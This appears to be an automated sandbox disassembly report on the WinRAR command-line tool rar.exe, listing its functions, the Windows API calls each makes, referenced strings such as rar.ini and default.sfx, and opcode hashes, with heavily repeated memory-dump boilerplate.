Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID:
String ID: H9
API String ID: 0-2207570329
Opcode ID: c5ebd6c55152d2db874ee1ad0a7897bbb9475bd8dcfe15870fa8873135614add
Instruction ID: a8c9a0bb3451daff44680fb30cc39c5884295a06f9a692e8c754220210adf882
Opcode Fuzzy Hash: c5ebd6c55152d2db874ee1ad0a7897bbb9475bd8dcfe15870fa8873135614add
Instruction Fuzzy Hash: 6EE1E2A2A0969285EF20EF25E844BFD23A5FB45B8CF454435EE0D933A5DF38E944D301

Function 00007FF6256D2574 Relevance: 7.6, APIs: 5, Instructions: 133
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 00007FF6256D25B0
WriteFile.KERNEL32 ref: 00007FF6256D25F9
WriteFile.KERNELBASE ref: 00007FF6256D262E
GetLastError.KERNEL32 ref: 00007FF6256D2658
SetLastError.KERNEL32 ref: 00007FF6256D2689

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: ErrorFileLastWrite$Handle
String ID:
API String ID: 3350704910-0
Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
Instruction ID: 813273fc632e9989e7da55893505923ffc763abd4d061b4314e9533ef8d9a759
Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
Instruction Fuzzy Hash: B151B126A0964287EE74DF26E81437A63A1FF48F84F240535DA5E87AB5CF3CE845C602

Function 00007FF6256D1E80 Relevance: 7.6, APIs: 5, Instructions: 127
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FF6256D1F4A
GetLastError.KERNEL32 ref: 00007FF6256D1F59
CreateFileW.KERNELBASE ref: 00007FF6256D1F99
GetLastError.KERNEL32 ref: 00007FF6256D1FA2
SetFileTime.KERNEL32 ref: 00007FF6256D1FF1

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
Instruction ID: 6dcdcdf253a3ef7b1fec9dc179a89c680fb51bf79816ca61ae838a95fbdabb3d
Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
Instruction Fuzzy Hash: 8B411472A1968146FB708F24E9057A96AD0B749FB8F140734DE7982BD8DFBDC8458B01

Function 00007FF6256C6AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6256C6C13

Strings

switches=, xrefs: 00007FF6256C6B80
switches_%ls=, xrefs: 00007FF6256C6C03
rar.ini, xrefs: 00007FF6256C6B37

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: swprintf
String ID: rar.ini$switches=$switches_%ls=
API String ID: 233258989-2235180025
Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
Instruction ID: a7ad20197aa6444aab729f18c8ae64b2b6349e7648fed548d3161840686d0832
Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
Instruction Fuzzy Hash: BB41B021A1868281EF24EF25DC141F923A0FF44BA4F441535EA5E83AE6EF7CED55D306

Function 00007FF6256E7E20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6256FB470: GetModuleHandleW.KERNEL32 ref: 00007FF6256FB488
Part of subcall function 00007FF6256FB470: GetProcAddress.KERNEL32 ref: 00007FF6256FB4A0
Part of subcall function 00007FF6256FB470: GetProcAddress.KERNEL32 ref: 00007FF6256FB4D5

Part of subcall function 00007FF6256C7A68: setbuf.LIBCMT ref: 00007FF6256C7A7B
Part of subcall function 00007FF6256C7A68: setbuf.LIBCMT ref: 00007FF6256C7A8F

SetErrorMode.KERNELBASE ref: 00007FF6256E7E5D
GetModuleHandleW.KERNEL32 ref: 00007FF6256E7E65

Part of subcall function 00007FF6256F48CC: GetVersionExW.KERNEL32(?,?,?,00007FF6256E7E7D), ref: 00007FF6256F496A
Part of subcall function 00007FF6256F48CC: LoadLibraryExW.KERNELBASE(?,?,?,00007FF6256E7E7D), ref: 00007FF6256F4993

new.LIBCMT ref: 00007FF6256E7EA8

Strings

rar.lng, xrefs: 00007FF6256E7E7D

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
String ID: rar.lng
API String ID: 553376247-2410228151
Opcode ID: 0cdb54aa40ba2ca26f1ddd7e9615ca47f74f76cd710d464ec92b81866409da64
Instruction ID: af8758b17cedbb84d188ee32a1b912816b6ae96be8dfe68cc3dcfc07bf95b775
Opcode Fuzzy Hash: 0cdb54aa40ba2ca26f1ddd7e9615ca47f74f76cd710d464ec92b81866409da64
Instruction Fuzzy Hash: 87416C21E0928245FE34AF25AC155B923A1BF42F55F580135EA0E8B7F7CE2DEC06A712

Function 00007FF6256E40A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetMalloc.SHELL32(?,00000800,?,00007FF6256E4432,?,?,?,?,00000800,00000000,00000000,00007FF6256E38CB,?,?,?,00007FF6256E41EC), ref: 00007FF6256E40C4
SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF6256E38CB,?,?,?,00007FF6256E41EC), ref: 00007FF6256E40DF
SHGetPathFromIDListW.SHELL32 ref: 00007FF6256E40F1

Part of subcall function 00007FF6256D3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF6256E413F,?,?,?,?,00000800,00000000,00000000,00007FF6256E38CB,?,?,?,00007FF6256E41EC), ref: 00007FF6256D34A0
Part of subcall function 00007FF6256D3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF6256E413F,?,?,?,?,00000800,00000000,00000000,00007FF6256E38CB,?,?,?,00007FF6256E41EC), ref: 00007FF6256D34D5

Strings

WinRAR, xrefs: 00007FF6256E410F

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
String ID: WinRAR
API String ID: 977838571-3970807970
Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
Instruction ID: 5c69bff2fb6c503eb43ef4343ff6c23e46bf8acfc2956b556e97e39c35e72d6a
Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
Instruction Fuzzy Hash: 4D214D26B09A4281EE609F22AD506BA6360BF89FD5B585031DF4E87B69DE3CD8458701

Function 00007FF6256D1C74 Relevance: 6.1, APIs: 4, Instructions: 55fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,?,?,?,00007FF6256D21A7,00000000,00000028,?,00007FF6256C7792), ref: 00007FF6256D1C97
ReadFile.KERNELBASE ref: 00007FF6256D1CB6
GetLastError.KERNEL32 ref: 00007FF6256D1CEA
GetLastError.KERNEL32 ref: 00007FF6256D1D08

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
Instruction ID: 0f2d0aa91d16aa6b5f8c4f3e11e1e05fed17b3420b955ee8f931c378b90b86af
Opcode Fuzzy Hash: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
Instruction Fuzzy Hash: 10215E21E0E94A81EE708F25E80033962A4BB49F94F304935EA59C76E9CFBDDC819752

Function 00007FF6256C49F8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON

Download Yara Rule

Strings

AFUM, xrefs: 00007FF6256C4B8C
default.sfx, xrefs: 00007FF6256C4AB0

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID:
String ID: AFUM$default.sfx
API String ID: 0-2491287583
Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
Instruction ID: abe38ee7c391730c12c74a00921fbe574ea289a8bbc6302c503bb683ac35101e
Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
Instruction Fuzzy Hash: 6D819221E0C68240EE70DF1199492BD22A0BF55F97F448031DE8D87AF6DF6EAC85E752

Function 00007FF625713B0C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF625713B36
GetModuleFileNameA.KERNELBASE(?,?,?,?,?,00007FF62570B066), ref: 00007FF625713B57

Strings

C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe, xrefs: 00007FF625713B45

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: FileModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe
API String ID: 3307058713-2598598277
Opcode ID: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
Instruction ID: 4b4c5bb34c79d31ded7865f6ca9fe90be10939c1227a250d5085852686a48180
Opcode Fuzzy Hash: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
Instruction Fuzzy Hash: AD41BE36A58A4285EF34DF259C601B877A5EB44F84B558035ED0E87B85DF3DEC81C302

Function 00007FF6257165BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF62571662E
GetFileType.KERNELBASE ref: 00007FF625716644

Strings

@, xrefs: 00007FF62571666F

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: FileHandleType
String ID: @
API String ID: 3000768030-2766056989
Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
Instruction ID: 09c7cb6da1627759c20a644396a0e1d6c0b3c18a9ac2de2fcd005a76af0562f3
Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
Instruction Fuzzy Hash: 39217322A5878241EF748F259CB01392655EB45F74F289339DA6E87BD8DF38EC81C302

Function 00007FF6256FB9BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00007FF6256FB9F8
SetThreadPriority.KERNEL32 ref: 00007FF6256FBA4E

Part of subcall function 00007FF6256CCDA4: wcschr.LIBVCRUNTIME ref: 00007FF6256CCE0F
Part of subcall function 00007FF6256CCDA4: wcschr.LIBVCRUNTIME ref: 00007FF6256CCE22

Part of subcall function 00007FF6256CCA40: _CxxThrowException.LIBVCRUNTIME ref: 00007FF6256CCEDE

Strings

CreateThread failed, xrefs: 00007FF6256FBA06

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: Threadwcschr$CreateExceptionPriorityThrow
String ID: CreateThread failed
API String ID: 1217111108-3849766595
Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
Instruction ID: b1dfcc22c02227afffa81ce3bf8da36eb32b70254455ef6e11a1eb71ae0c32b2
Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
Instruction Fuzzy Hash: A6116A31A08A4282EF25DF15EC411BA7371FB84F84F548036EA9E82679DF3CE946D701

Function 00007FF6256FBB80 Relevance: 4.5, APIs: 3, Instructions: 30COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,00007FF6256FBB79), ref: 00007FF6256FBBB9
SetEvent.KERNEL32 ref: 00007FF6256FBBCF
LeaveCriticalSection.KERNEL32 ref: 00007FF6256FBBD8

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID:
API String ID: 3094578987-0
Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
Instruction ID: 38b6c4e1407cf40713a6a7dc2a0411577914552afbd9af3e5e525d08deb7dc34
Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
Instruction Fuzzy Hash: 44F01226A08A4682DE709F21FD4407D6361FF89F99F144131DE9E86A79CE2CD9458B11

Function 00007FF625712488 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF62571246C), ref: 00007FF6257124B0
TerminateProcess.KERNEL32(?,?,?,00007FF62571246C), ref: 00007FF6257124BB
ExitProcess.KERNEL32 ref: 00007FF6257124CA

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
